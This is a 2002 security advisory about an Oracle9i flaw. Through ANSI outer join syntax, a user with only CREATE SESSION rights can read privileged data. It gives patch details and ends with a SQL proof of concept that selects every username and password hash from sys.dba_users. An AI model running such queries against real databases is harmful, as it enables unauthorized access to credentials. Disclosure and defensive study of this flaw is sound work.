User Privileges Vulnerability in Oracle9i Database Server
21 Apr. 2002
Summary
A potential security vulnerability has been discovered in Oracle9i database server. It is possible to create a user defined in the Oracle9i database server with limited privileges who can potentially access privileged data using SQL syntax for outer joins. As such, a knowledgeable and malicious user can gain unauthorized access to data in Oracle9i database server.
Credit:
The information has been provided by Pete Finnigan.
Immune systems:
None of the Oracle8i (Release 8.1.x), Oracle8 (Release 8.0.x) or Oracle7 database server release is affected by this vulnerability.
Oracle 9i includes the new ANSI outer join syntax. Oracle still supports the old syntax but in the new syntax, there is a serious security issue that allows any user to view any data.
Workarounds:
There are no workarounds to protect against this potential vulnerability.
Patch Information:
Oracle has fixed the potential vulnerability identified above in the upcoming Oracle Database server release, Oracle9i, Release 2. Patches with the base bug fix number, 2121935, are being made available only for supported releases of Oracle9i, Releases 9.0.1.x, database server on all supported platforms.
Download currently available patches for your platform from Oracle's Worldwide Support web site, Metalink, http://metalink.oracle.com. Activate the "Patches" button to get to the patches Web page. Enter the base bug fix number indicated above and activate the "Submit" button. Please check with Metalink or Oracle Worldwide Support Services periodically for patch availability if the patch for your platform is not yet available.
Example:
SQL> connect / as sysdba
Connected.
SQL> CREATE USER us1 IDENTIFIED BY us11;
User created.
SQL> Grant Create Session to us1;
Grant succeeded.
SQL> connect us1/us11;
Connected.
SQL> select a.username, a.password
2 from sys.dba_users a left outer join sys.dba_users b on
3 b.username = a.username
4 ;
This illustrates that a user with the barest of privileges, i.e. CREATE SESSION can actually see data in the data dictionary that should not be seen. In this example, we can select the list of usernames and their hashes.
